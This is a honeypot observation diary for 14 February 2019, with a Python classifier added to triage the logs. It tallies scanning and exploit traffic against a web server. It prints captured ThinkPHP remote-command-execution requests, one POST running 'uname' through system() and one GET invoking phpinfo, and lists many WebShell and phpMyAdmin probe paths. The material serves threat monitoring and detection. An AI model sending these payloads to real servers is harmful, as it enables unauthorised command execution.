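Honeypot Observation Diary (2019/02/14)
WOWHoneypot
This is a brief analysis of the logs collected by the honeypot "WOWHoneypot" on 2019/02/14 (Thu) 00:00-23:59 UTC (day 42 of operation).
Highlights
- Three bursts of access were observed, consisting mainly of probes for WebShells, phpMyAdmin, and similar targets.
- Two attacks exploiting the ThinkPHP vulnerability were observed, the first in 27 days (since 2019/01/18).
- A probe for Adobe ColdFusion was observed, the first in 15 days (since 2019/01/30).
- ZGrab scans were observed for the fifth consecutive day.
- A MASSCAN scan was observed, the first in 9 days (since 2019/02/05).
Overview
- Aggregation period: 2019/02/14 (Thu) 00:00-23:59 UTC
- Total requests: 752 (+713 from the previous day)
  - WebShell probes: 446
  - phpMyAdmin probes: 240
  - Login attempts against the Tomcat manager page: 28
  - Access to the top page: 18
  - Network Weathermap probes: 6
  - Attacks exploiting the Microsoft IIS 6.0 vulnerability (CVE-2017-7269): 3
  - WebDAV probes: 3
  - Attacks exploiting the Portable phpMyAdmin for WordPress vulnerability (CVE-2012-5469): 3
  - Adobe ColdFusion probes: 2
  - Attacks exploiting the ThinkPHP vulnerability (reference): 2
  - ThinkPHP probes: 1
  - WordPress config file probes: 1
  - Unknown: 1
- Unique IP addresses: 23 (±0 from the previous day)
- Source countries: 12 (-2 from the previous day)
Requests by country
The number of requests per country is as follows.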
Rank | Country | Count | Previous day's rank | Previous day's count | Difference | Note |
---|---|---|---|---|---|---|
1. | China | 545 | - | 0 | +545 | - |
2. | Italy | 185 | 13. | 1 | +184 | - |
3. | United States | 6 | 3. | 4 | +2 | - |
4. | Brazil | 4 | 2. | 5 | -1 | - |
5. | France | 3 | - | 0 | +3 | - |
6. | Poland | 2 | - | 0 | +2 | - |
7. | Nigeria | 2 | - | 0 | +2 | - |
8. | South Africa | 1 | - | 0 | +1 | - |
9. | Japan | 1 | - | 0 | +1 | - |
10. | India | 1 | 4. | 2 | -1 | - |
11. | Cambodia | 1 | 12. | 1 | ±0 | - |
12. | Bangladesh | 1 | 6. | 1 | ±0 | - |
User-Agent
The User-Agent values contained in the HTTP requests are as follows.
Rank | User-Agent | Count | Previous day's rank | Previous day's count | Difference | Note |
---|---|---|---|---|---|---|
1. | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | 238 | - | 0 | +238 | Used only for WebShell probes |
2. | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36 | 126 | - | 0 | +126 | Used mainly for WebShell and phpMyAdmin probes |
3. | Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 | 77 | - | 0 | +77 | Used mainly for phpMyAdmin probes |
4. | Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 | 62 | - | 0 | +62 | Used only for WebShell probes |
5. | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0 | 61 | - | 0 | +61 | Used mainly for phpMyAdmin probes |
6. | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0) | 58 | - | 0 | +58 | Used only for WebShell probes |
7. | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 | 43 | - | 0 | +43 | Used for probes of WebShells, phpMyAdmin, and others |
8. | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36 | 29 | - | 0 | +29 | Used mainly for WebShell and phpMyAdmin probes |
9. | Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0 | 10 | - | 0 | +10 | Used only for login attempts against the Tomcat manager page |
10. | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 | 9 | - | 0 | +9 | Used only for login attempts against the Tomcat manager page |
11. | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0) | 9 | - | 0 | +9 | Used only for login attempts against the Tomcat manager page |
12. | (not set) | 5 | 7. | 1 | +4 | - |
13. | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 | 5 | - | 0 | +5 | - |
14. | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 | 4 | 3. | 4 | ±0 | - |
15. | Mozilla/5.0 | 3 | - | 0 | +3 | Used only for WebDAV probes |
16. | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) | 3 | - | 0 | +3 | Used mainly for ThinkPHP probes and attacks exploiting its vulnerability |
17. | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 | 2 | 4. | 4 | -2 | - |
18. | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 | 2 | 2. | 7 | -5 | - |
19. | Mozilla/5.0 zgrab/0.x | 1 | 5. | 3 | -2 | ZGrab scan |
20. | Go-http-client/1.1 | 1 | - | 0 | +1 | Used only for attacks exploiting the ThinkPHP vulnerability |
21. | HTTP Banner Detection (https://security.ipip.net) | 1 | - | 0 | +1 | - |
22. | masscan/1.0 (https://github.com/robertdavidgraham/masscan) | 1 | - | 0 | +1 | MASSCAN scan |
23. | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 | 1 | - | 0 | +1 | - |
24. | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 | 1 | - | 0 | +1 | - |
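Requested paths
- Three bursts of access were observed, consisting mainly of probes for WebShells, phpMyAdmin, and similar targets.
- Two attacks exploiting the ThinkPHP vulnerability were observed, the first in 27 days (since 2019/01/18).
  - One of them used the POST method; this is the first time an attack using a POST request was observed.
- A probe for Adobe ColdFusion was observed, the first in 15 days (since 2019/01/30).
- ZGrab scans were observed for the fifth consecutive day.
  - Count: 1 request.
  - The User-Agent was Mozilla/5.0 zgrab/0.x.
  - The source IP address was registered to University of Michigan (AS36375).
- A MASSCAN scan was observed, the first in 9 days (since 2019/02/05).
  - Count: 1 request.
  - The User-Agent was masscan/1.0 (https://github.com/robertdavidgraham/masscan).
  - The source IP address was registered to DigitalOcean, LLC (AS14061).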
Attack exploiting the ThinkPHP vulnerability
An attack targeting the ThinkPHP vulnerability using the POST method was observed for the first time.
It attempted to execute the uname and ipconfig commands.

```
POST /TP/public/index.php?s=captcha HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Go-http-client/1.1
Content-Length: 84
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=uname&ipconfig
```
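Added example (not part of the original post, and not WOWHoneypot code): a small Python classifier that decodes the query string and form body of a logged request and labels the two ThinkPHP request shapes recorded on this page, plus the bare probe. The sample requests are constructed from the requests shown in this post; the label names and result keys are assumptions made for this example.

```python
from urllib.parse import parse_qsl

# Constructed samples modelled on the ThinkPHP requests listed on this page:
# (method, request target, body).
SAMPLES = [
    ("GET", "/TP/public/index.php?s=index/\\think\\app/invokefunction"
            "&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1", ""),
    ("POST", "/TP/public/index.php?s=captcha",
     "_method=__construct&filter[]=system&method=get"
     "&server[REQUEST_METHOD]=uname&ipconfig"),
    ("GET", "/TP/public/index.php", ""),
    ("GET", "/manager/html", ""),
]


def classify_thinkphp(method, target, body=""):
    """Label one request; return None when it is not ThinkPHP-related.

    The labels and result keys are names chosen for this example.
    """
    path, _, raw_query = target.partition("?")
    query = parse_qsl(raw_query, keep_blank_values=True)
    form = parse_qsl(body, keep_blank_values=True) if method.upper() == "POST" else []
    q, f = dict(query), dict(form)

    route = q.get("s", "").lower()
    if "invokefunction" in route and "\\think\\" in route:
        # GET shape: callable name in vars[0], its arguments in vars[1][]
        return {
            "label": "invokefunction",
            "callable": q.get("vars[0]"),
            "arguments": [v for k, v in query if k.startswith("vars[1]")],
            "stray_fields": [],
        }

    if f.get("_method") == "__construct" and "filter[]" in f:
        # POST shape: callable name in filter[], argument in server[REQUEST_METHOD].
        # Empty-valued fields are reported as well: the form decoder splits on the
        # unencoded "&", so "ipconfig" arrives as its own field with no value.
        return {
            "label": "method-override",
            "callable": f["filter[]"],
            "arguments": [f.get("server[REQUEST_METHOD]", "")],
            "stray_fields": [k for k, v in form if v == ""],
        }

    if path.lower().endswith("/public/index.php"):
        # Assumption: a bare hit on the framework entry point counts as a probe
        return {"label": "probe", "callable": None,
                "arguments": [], "stray_fields": []}
    return None


def summarize(samples):
    """Return the label (or None) for each sample, in order."""
    labels = []
    for method, target, body in samples:
        hit = classify_thinkphp(method, target, body)
        labels.append(hit["label"] if hit else None)
    return labels


if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample[0], sample[1].partition("?")[0], "->",
              classify_thinkphp(*sample))
```

Reading the decoded fields rather than the raw body matters when triaging these logs: the decoder reports `uname` as the argument and `ipconfig` as a separate empty field.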
Access with unclear intent
A single IP address accessed only this path.
Could this also be a WebShell probe?

```
GET /825256118F24664C77F161AB6ADA62D7.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Host: xxx.xxx.xxx.xxx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
```
List of requested paths
The full list of requested paths is as follows.
Rank | Note | Request | Count | Previous day's rank | Previous day's count | Difference |
---|---|---|---|---|---|---|
1. | Login attempt against the Tomcat manager page | GET /manager/html HTTP/1.1 | 28 | - | 0 | +28 |
2. | Access to the top page | GET / HTTP/1.1 | 16 | 1. | 21 | -5 |
3. | WebShell probe | POST /qq.php HTTP/1.1 | 10 | - | 0 | +10 |
4. | WebShell probe | GET /cmd.php HTTP/1.1 | 6 | - | 0 | +6 |
5. | WebShell probe | POST /xx.php HTTP/1.1 | 6 | - | 0 | +6 |
6. | phpMyAdmin probe | GET /PMA/index.php HTTP/1.1 | 6 | - | 0 | +6 |
7. | phpMyAdmin probe | GET /web/phpMyAdmin/index.php HTTP/1.1 | 6 | - | 0 | +6 |
8. | phpMyAdmin probe | GET /admin/pma/index.php HTTP/1.1 | 6 | - | 0 | +6 |
9. | phpMyAdmin probe | GET /xampp/phpmyadmin/index.php HTTP/1.1 | 6 | - | 0 | +6 |
10. | phpMyAdmin probe | GET /tools/phpMyAdmin/index.php HTTP/1.1 | 6 | - | 0 | +6 |
11. | phpMyAdmin probe | GET /MyAdmin/index.php HTTP/1.1 | 6 | - | 0 | +6 |
12. | WebShell probe | GET /shell.php HTTP/1.1 | 5 | - | 0 | +5 |
13. | WebShell probe | POST /conflg.php HTTP/1.1 | 5 | - | 0 | +5 |
14. | WebShell probe | POST /q.php HTTP/1.1 | 5 | - | 0 | +5 |
15. | WebShell probe | POST /1.php HTTP/1.1 | 5 | - | 0 | +5 |
16. | phpMyAdmin probe | GET /admin/PMA/index.php HTTP/1.1 | 5 | - | 0 | +5 |
17. | phpMyAdmin probe | GET /www/phpMyAdmin/index.php HTTP/1.1 | 5 | - | 0 | +5 |
18. | phpMyAdmin probe | GET /typo3/phpmyadmin/index.php HTTP/1.1 | 5 | - | 0 | +5 |
19. | phpMyAdmin probe | GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.1 | 5 | - | 0 | +5 |
20. | WebShell probe | POST /test.php HTTP/1.1 | 4 | - | 0 | +4 |
21. | WebShell probe | POST /confg.php HTTP/1.1 | 4 | - | 0 | +4 |
22. | WebShell probe | POST /x.php HTTP/1.1 | 4 | - | 0 | +4 |
23. | phpMyAdmin probe | GET /pma/index.php HTTP/1.1 | 4 | - | 0 | +4 |
24. | phpMyAdmin probe | GET /admin/phpmyadmin/index.php HTTP/1.1 | 4 | - | 0 | +4 |
25. | phpMyAdmin probe | GET /admin/phpMyAdmin/index.php HTTP/1.1 | 4 | - | 0 | +4 |
26. | phpMyAdmin probe | GET /claroline/phpMyAdmin/index.php HTTP/1.1 | 4 | - | 0 | +4 |
27. | phpMyAdmin probe | GET /phpmyadmin/phpmyadmin/index.php HTTP/1.1 | 4 | - | 0 | +4 |
28. | Attack exploiting the Microsoft IIS 6.0 vulnerability (CVE-2017-7269) | PROPFIND / HTTP/1.1 | 3 | - | 0 | +3 |
29. | WebDAV probe | GET /webdav/ HTTP/1.1 | 3 | - | 0 | +3 |
30. | WebShell probe | GET /java.php HTTP/1.1 | 3 | - | 0 | +3 |
31. | WebShell probe | GET /_query.php HTTP/1.1 | 3 | - | 0 | +3 |
32. | WebShell probe | GET /test.php HTTP/1.1 | 3 | - | 0 | +3 |
33. | WebShell probe | GET /db_cts.php HTTP/1.1 | 3 | - | 0 | +3 |
34. | WebShell probe | GET /logon.php HTTP/1.1 | 3 | - | 0 | +3 |
35. | WebShell probe | GET /license.php HTTP/1.1 | 3 | - | 0 | +3 |
36. | WebShell probe | GET /log.php HTTP/1.1 | 3 | - | 0 | +3 |
37. | WebShell probe | GET /hell.php HTTP/1.1 | 3 | - | 0 | +3 |
38. | WebShell probe | GET /pmd_online.php HTTP/1.1 | 3 | - | 0 | +3 |
39. | WebShell probe | GET /x.php HTTP/1.1 | 3 | - | 0 | +3 |
40. | WebShell probe | GET /htdocs.php HTTP/1.1 | 3 | - | 0 | +3 |
41. | WebShell probe | GET /desktop.ini.php HTTP/1.1 | 3 | - | 0 | +3 |
42. | WebShell probe | GET /cmdd.php HTTP/1.1 | 3 | - | 0 | +3 |
43. | WebShell probe | GET /knal.php HTTP/1.1 | 3 | - | 0 | +3 |
44. | WebShell probe | GET /appserv.php HTTP/1.1 | 3 | - | 0 | +3 |
45. | phpMyAdmin probe | GET /scripts/setup.php HTTP/1.1 | 3 | - | 0 | +3 |
46. | phpMyAdmin probe | GET /phpMyAdmin/scripts/setup.php HTTP/1.1 | 3 | - | 0 | +3 |
47. | phpMyAdmin probe | GET /phpMyAdmin/scripts/db___.init.php HTTP/1.1 | 3 | - | 0 | +3 |
48. | Network Weathermap probe | GET /plugins/weathermap/editor.php HTTP/1.1 | 3 | - | 0 | +3 |
49. | Network Weathermap probe | GET /cacti/plugins/weathermap/editor.php HTTP/1.1 | 3 | - | 0 | +3 |
50. | WebShell probe | POST /s.php HTTP/1.1 | 3 | - | 0 | +3 |
51. | WebShell probe | POST /w.php HTTP/1.1 | 3 | - | 0 | +3 |
52. | WebShell probe | POST /sheep.php HTTP/1.1 | 3 | - | 0 | +3 |
53. | WebShell probe | POST /qaq.php HTTP/1.1 | 3 | - | 0 | +3 |
54. | WebShell probe | POST /db_session.init.php HTTP/1.1 | 3 | - | 0 | +3 |
55. | WebShell probe | POST /db__.init.php HTTP/1.1 | 3 | - | 0 | +3 |
56. | WebShell probe | POST /m.php?pbid=open HTTP/1.1 | 3 | - | 0 | +3 |
57. | WebShell probe | POST /db_dataml.php HTTP/1.1 | 3 | - | 0 | +3 |
58. | WebShell probe | POST /db_desql.php HTTP/1.1 | 3 | - | 0 | +3 |
59. | WebShell probe | POST /wshell.php HTTP/1.1 | 3 | - | 0 | +3 |
60. | WebShell probe | POST /xshell.php HTTP/1.1 | 3 | - | 0 | +3 |
61. | WebShell probe | POST /lindex.php HTTP/1.1 | 3 | - | 0 | +3 |
62. | WebShell probe | POST /phpstudy.php HTTP/1.1 | 3 | - | 0 | +3 |
63. | WebShell probe | POST /phpStudy.php HTTP/1.1 | 3 | - | 0 | +3 |
64. | WebShell probe | POST /weixiao.php HTTP/1.1 | 3 | - | 0 | +3 |
65. | WebShell probe | POST /feixiang.php HTTP/1.1 | 3 | - | 0 | +3 |
66. | WebShell probe | POST /ak48.php HTTP/1.1 | 3 | - | 0 | +3 |
67. | WebShell probe | POST /xiao.php HTTP/1.1 | 3 | - | 0 | +3 |
68. | WebShell probe | POST /defect.php HTTP/1.1 | 3 | - | 0 | +3 |
69. | WebShell probe | POST /webslee.php HTTP/1.1 | 3 | - | 0 | +3 |
70. | WebShell probe | POST /pe.php HTTP/1.1 | 3 | - | 0 | +3 |
71. | WebShell probe | POST /hm.php HTTP/1.1 | 3 | - | 0 | +3 |
72. | WebShell probe | POST /cainiao.php HTTP/1.1 | 3 | - | 0 | +3 |
73. | WebShell probe | POST /zuoshou.php HTTP/1.1 | 3 | - | 0 | +3 |
74. | WebShell probe | POST /zuo.php HTTP/1.1 | 3 | - | 0 | +3 |
75. | WebShell probe | POST /aotu.php HTTP/1.1 | 3 | - | 0 | +3 |
76. | WebShell probe | POST /aotu7.php HTTP/1.1 | 3 | - | 0 | +3 |
77. | WebShell probe | POST /cmd.php HTTP/1.1 | 3 | - | 0 | +3 |
78. | WebShell probe | POST /system.php HTTP/1.1 | 3 | - | 0 | +3 |
79. | WebShell probe | POST /l6.php HTTP/1.1 | 3 | - | 0 | +3 |
80. | WebShell probe | POST /l8.php HTTP/1.1 | 3 | - | 0 | +3 |
81. | WebShell probe | POST /56.php HTTP/1.1 | 3 | - | 0 | +3 |
82. | WebShell probe | POST /mz.php HTTP/1.1 | 3 | - | 0 | +3 |
83. | WebShell probe | POST /yumo.php HTTP/1.1 | 3 | - | 0 | +3 |
84. | WebShell probe | POST /min.php HTTP/1.1 | 3 | - | 0 | +3 |
85. | WebShell probe | POST /wan.php HTTP/1.1 | 3 | - | 0 | +3 |
86. | WebShell probe | POST /wanan.php HTTP/1.1 | 3 | - | 0 | +3 |
87. | WebShell probe | POST /ssaa.php HTTP/1.1 | 3 | - | 0 | +3 |
88. | WebShell probe | POST /12.php HTTP/1.1 | 3 | - | 0 | +3 |
89. | WebShell probe | POST /hh.php HTTP/1.1 | 3 | - | 0 | +3 |
90. | WebShell probe | POST /ak.php HTTP/1.1 | 3 | - | 0 | +3 |
91. | WebShell probe | POST /ip.php HTTP/1.1 | 3 | - | 0 | +3 |
92. | WebShell probe | POST /infoo.php HTTP/1.1 | 3 | - | 0 | +3 |
93. | WebShell probe | POST /qwe.php HTTP/1.1 | 3 | - | 0 | +3 |
94. | phpMyAdmin probe | GET /phpmyadmin/index.php HTTP/1.1 | 3 | - | 0 | +3 |
95. | phpMyAdmin probe | GET /PMA2/index.php HTTP/1.1 | 3 | - | 0 | +3 |
96. | phpMyAdmin probe | GET /pmamy2/index.php HTTP/1.1 | 3 | - | 0 | +3 |
97. | phpMyAdmin probe | GET /mysql/index.php HTTP/1.1 | 3 | - | 0 | +3 |
98. | phpMyAdmin probe | GET /admin/index.php HTTP/1.1 | 3 | - | 0 | +3 |
99. | phpMyAdmin probe | GET /admin/mysql/index.php HTTP/1.1 | 3 | - | 0 | +3 |
100. | phpMyAdmin probe | GET /admin/mysql2/index.php HTTP/1.1 | 3 | - | 0 | +3 |
101. | phpMyAdmin probe | GET /admin/phpmyadmin2/index.php HTTP/1.1 | 3 | - | 0 | +3 |
102. | phpMyAdmin probe | GET /mysqladmin/index.php HTTP/1.1 | 3 | - | 0 | +3 |
103. | phpMyAdmin probe | GET /mysql_admin/index.php HTTP/1.1 | 3 | - | 0 | +3 |
104. | phpMyAdmin probe | GET /phpadmin/index.php HTTP/1.1 | 3 | - | 0 | +3 |
105. | phpMyAdmin probe | GET /phpAdmin/index.php HTTP/1.1 | 3 | - | 0 | +3 |
106. | phpMyAdmin probe | GET /phpmyadmin0/index.php HTTP/1.1 | 3 | - | 0 | +3 |
107. | phpMyAdmin probe | GET /phpMyAdmin-4.4.0/index.php HTTP/1.1 | 3 | - | 0 | +3 |
108. | phpMyAdmin probe | GET /phpMyadmin_bak/index.php HTTP/1.1 | 3 | - | 0 | +3 |
109. | phpMyAdmin probe | GET /phpmyadmin-old/index.php HTTP/1.1 | 3 | - | 0 | +3 |
110. | phpMyAdmin probe | GET /phpMyAdminold/index.php HTTP/1.1 | 3 | - | 0 | +3 |
111. | phpMyAdmin probe | GET /phpMyAdmin.old/index.php HTTP/1.1 | 3 | - | 0 | +3 |
112. | phpMyAdmin probe | GET /pma-old/index.php HTTP/1.1 | 3 | - | 0 | +3 |
113. | phpMyAdmin probe | GET /phpma/index.php HTTP/1.1 | 3 | - | 0 | +3 |
114. | phpMyAdmin probe | GET /phpMyAbmin/index.php HTTP/1.1 | 3 | - | 0 | +3 |
115. | phpMyAdmin probe | GET /phpMyAdmin__/index.php HTTP/1.1 | 3 | - | 0 | +3 |
116. | phpMyAdmin probe | GET /phpMyAdmin+++---/index.php HTTP/1.1 | 3 | - | 0 | +3 |
117. | phpMyAdmin probe | GET /phpmyadm1n/index.php HTTP/1.1 | 3 | - | 0 | +3 |
118. | phpMyAdmin probe | GET /phpMyAdm1n/index.php HTTP/1.1 | 3 | - | 0 | +3 |
119. | phpMyAdmin probe | GET /shaAdmin/index.php HTTP/1.1 | 3 | - | 0 | +3 |
120. | phpMyAdmin probe | GET /phpMyadmi/index.php HTTP/1.1 | 3 | - | 0 | +3 |
121. | phpMyAdmin probe | GET /phpMyAdmion/index.php HTTP/1.1 | 3 | - | 0 | +3 |
122. | phpMyAdmin probe | GET /phpMyAdmin1/index.php HTTP/1.1 | 3 | - | 0 | +3 |
123. | phpMyAdmin probe | GET /phpMyAdmin123/index.php HTTP/1.1 | 3 | - | 0 | +3 |
124. | phpMyAdmin probe | GET /pwd/index.php HTTP/1.1 | 3 | - | 0 | +3 |
125. | phpMyAdmin probe | GET /phpMyAdmina/index.php HTTP/1.1 | 3 | - | 0 | +3 |
126. | phpMyAdmin probe | GET /phpMydmin/index.php HTTP/1.1 | 3 | - | 0 | +3 |
127. | phpMyAdmin probe | GET /program/index.php HTTP/1.1 | 3 | - | 0 | +3 |
128. | phpMyAdmin probe | GET /shopdb/index.php HTTP/1.1 | 3 | - | 0 | +3 |
129. | phpMyAdmin probe | GET /phppma/index.php HTTP/1.1 | 3 | - | 0 | +3 |
130. | phpMyAdmin probe | GET /phpmy/index.php HTTP/1.1 | 3 | - | 0 | +3 |
131. | phpMyAdmin probe | GET /mysql/admin/index.php HTTP/1.1 | 3 | - | 0 | +3 |
132. | phpMyAdmin probe | GET /mysql/dbadmin/index.php HTTP/1.1 | 3 | - | 0 | +3 |
133. | phpMyAdmin probe | GET /mysql/mysqlmanager/index.php HTTP/1.1 | 3 | - | 0 | +3 |
134. | Attack exploiting the Portable phpMyAdmin for WordPress vulnerability (CVE-2012-5469) | GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php HTTP/1.1 | 3 | - | 0 | +3 |
135. | WebShell probe | GET /help.php HTTP/1.1 | 2 | - | 0 | +2 |
136. | phpMyAdmin probe | GET /db_pma.php HTTP/1.1 | 2 | - | 0 | +2 |
137. | WebShell probe | GET /help-e.php HTTP/1.1 | 2 | - | 0 | +2 |
138. | WebShell probe | GET /z.php HTTP/1.1 | 2 | - | 0 | +2 |
139. | WebShell probe | GET /lala.php HTTP/1.1 | 2 | - | 0 | +2 |
140. | WebShell probe | GET /lala-dpr.php HTTP/1.1 | 2 | - | 0 | +2 |
141. | WebShell probe | GET /wpc.php HTTP/1.1 | 2 | - | 0 | +2 |
142. | WebShell probe | GET /wpo.php HTTP/1.1 | 2 | - | 0 | +2 |
143. | WebShell probe | GET /text.php HTTP/1.1 | 2 | - | 0 | +2 |
144. | WebShell probe | GET /muhstik.php HTTP/1.1 | 2 | - | 0 | +2 |
145. | WebShell probe | GET /muhstik2.php HTTP/1.1 | 2 | - | 0 | +2 |
146. | WebShell probe | GET /muhstiks.php HTTP/1.1 | 2 | - | 0 | +2 |
147. | WebShell probe | GET /muhstik-dpr.php HTTP/1.1 | 2 | - | 0 | +2 |
148. | WebShell probe | GET /lol.php HTTP/1.1 | 2 | - | 0 | +2 |
149. | WebShell probe | GET /uploader.php HTTP/1.1 | 2 | - | 0 | +2 |
150. | WebShell probe | GET /cmv.php HTTP/1.1 | 2 | - | 0 | +2 |
151. | phpMyAdmin probe | GET /phpmyadmin/scripts/setup.php HTTP/1.1 | 2 | - | 0 | +2 |
152. | phpMyAdmin probe | GET /phpmyadmin/scripts/db___.init.php HTTP/1.1 | 2 | - | 0 | +2 |
153. | WebShell probe | POST /wuwu11.php HTTP/1.1 | 2 | - | 0 | +2 |
154. | WebShell probe | POST /xw.php HTTP/1.1 | 2 | - | 0 | +2 |
155. | WebShell probe | POST /xw1.php HTTP/1.1 | 2 | - | 0 | +2 |
156. | WebShell probe | POST /9678.php HTTP/1.1 | 2 | - | 0 | +2 |
157. | WebShell probe | POST /wc.php HTTP/1.1 | 2 | - | 0 | +2 |
158. | WebShell probe | POST /db.init.php HTTP/1.1 | 2 | - | 0 | +2 |
159. | WebShell probe | POST /wp-admins.php HTTP/1.1 | 2 | - | 0 | +2 |
160. | WebShell probe | POST /mx.php HTTP/1.1 | 2 | - | 0 | +2 |
161. | WebShell probe | POST /ak47.php HTTP/1.1 | 2 | - | 0 | +2 |
162. | WebShell probe | POST /yao.php HTTP/1.1 | 2 | - | 0 | +2 |
163. | WebShell probe | POST /bak.php HTTP/1.1 | 2 | - | 0 | +2 |
164. | WebShell probe | POST /l7.php HTTP/1.1 | 2 | - | 0 | +2 |
165. | WebShell probe | POST /aw.php HTTP/1.1 | 2 | - | 0 | +2 |
166. | WebShell probe | POST /1213.php HTTP/1.1 | 2 | - | 0 | +2 |
167. | WebShell probe | POST /post.php HTTP/1.1 | 2 | - | 0 | +2 |
168. | WebShell probe | POST /aaaa.php HTTP/1.1 | 2 | - | 0 | +2 |
169. | WebShell probe | POST /h1.php HTTP/1.1 | 2 | - | 0 | +2 |
170. | WebShell probe | POST /2.php HTTP/1.1 | 2 | - | 0 | +2 |
171. | WebShell probe | POST /z.php HTTP/1.1 | 2 | - | 0 | +2 |
172. | WebShell probe | POST /api.php HTTP/1.1 | 2 | - | 0 | +2 |
173. | WebShell probe | POST /hello.php HTTP/1.1 | 2 | - | 0 | +2 |
174. | WebShell probe | POST /lucky.php HTTP/1.1 | 2 | - | 0 | +2 |
175. | WebShell probe | POST /MCLi.php HTTP/1.1 | 2 | - | 0 | +2 |
176. | WebShell probe | POST /zxc1.php HTTP/1.1 | 2 | - | 0 | +2 |
177. | WebShell probe | POST /test123.php HTTP/1.1 | 2 | - | 0 | +2 |
178. | WebShell probe | POST /paylog.php HTTP/1.1 | 2 | - | 0 | +2 |
179. | phpMyAdmin probe | GET /index.php HTTP/1.1 | 2 | - | 0 | +2 |
180. | phpMyAdmin probe | GET /phpMyAdmin/index.php HTTP/1.1 | 2 | - | 0 | +2 |
181. | phpMyAdmin probe | GET /pmd/index.php HTTP/1.1 | 2 | - | 0 | +2 |
182. | phpMyAdmin probe | GET /pmamy/index.php HTTP/1.1 | 2 | - | 0 | +2 |
183. | phpMyAdmin probe | GET /db/index.php HTTP/1.1 | 2 | - | 0 | +2 |
184. | phpMyAdmin probe | GET /dbadmin/index.php HTTP/1.1 | 2 | - | 0 | +2 |
185. | phpMyAdmin probe | GET /mysql-admin/index.php HTTP/1.1 | 2 | - | 0 | +2 |
186. | phpMyAdmin probe | GET /phpmyadmin1/index.php HTTP/1.1 | 2 | - | 0 | +2 |
187. | phpMyAdmin probe | GET /phpmyadmin2/index.php HTTP/1.1 | 2 | - | 0 | +2 |
188. | phpMyAdmin probe | GET /myadmin/index.php HTTP/1.1 | 2 | - | 0 | +2 |
189. | phpMyAdmin probe | GET /myadmin2/index.php HTTP/1.1 | 2 | - | 0 | +2 |
190. | phpMyAdmin probe | GET /v/index.php HTTP/1.1 | 2 | - | 0 | +2 |
191. | WebShell probe | GET /cmx.php HTTP/1.1 | 2 | - | 0 | +2 |
192. | Access to the top page | GET / HTTP/1.0 | 2 | - | 0 | +2 |
193. | Adobe ColdFusion probe | GET /CFIDE/administrator/ HTTP/1.1 | 2 | - | 0 | +2 |
194. | WordPress config file probe | GET /wp-config.php HTTP/1.1 | 1 | - | 0 | +1 |
195. | WebShell probe | POST /3.php HTTP/1.1 | 1 | - | 0 | +1 |
196. | WebShell probe | POST /phpinfi.php HTTP/1.1 | 1 | - | 0 | +1 |
197. | WebShell probe | POST /9510.php HTTP/1.1 | 1 | - | 0 | +1 |
198. | WebShell probe | POST /python.php HTTP/1.1 | 1 | - | 0 | +1 |
199. | WebShell probe | POST /default.php HTTP/1.1 | 1 | - | 0 | +1 |
200. | WebShell probe | POST /sean.php HTTP/1.1 | 1 | - | 0 | +1 |
201. | WebShell probe | POST /app.php HTTP/1.1 | 1 | - | 0 | +1 |
202. | WebShell probe | POST /help.php HTTP/1.1 | 1 | - | 0 | +1 |
203. | WebShell probe | POST /tiandi.php HTTP/1.1 | 1 | - | 0 | +1 |
204. | WebShell probe | POST /miao.php HTTP/1.1 | 1 | - | 0 | +1 |
205. | WebShell probe | POST /xz.php HTTP/1.1 | 1 | - | 0 | +1 |
206. | WebShell probe | POST /linuxse.php HTTP/1.1 | 1 | - | 0 | +1 |
207. | WebShell probe | POST /zuoindex.php HTTP/1.1 | 1 | - | 0 | +1 |
208. | WebShell probe | POST /zshmindex.php HTTP/1.1 | 1 | - | 0 | +1 |
209. | WebShell probe | POST /tomcat.php HTTP/1.1 | 1 | - | 0 | +1 |
210. | WebShell probe | POST /ceshi.php HTTP/1.1 | 1 | - | 0 | +1 |
211. | WebShell probe | POST /1hou.php HTTP/1.1 | 1 | - | 0 | +1 |
212. | WebShell probe | POST /ou2.php HTTP/1.1 | 1 | - | 0 | +1 |
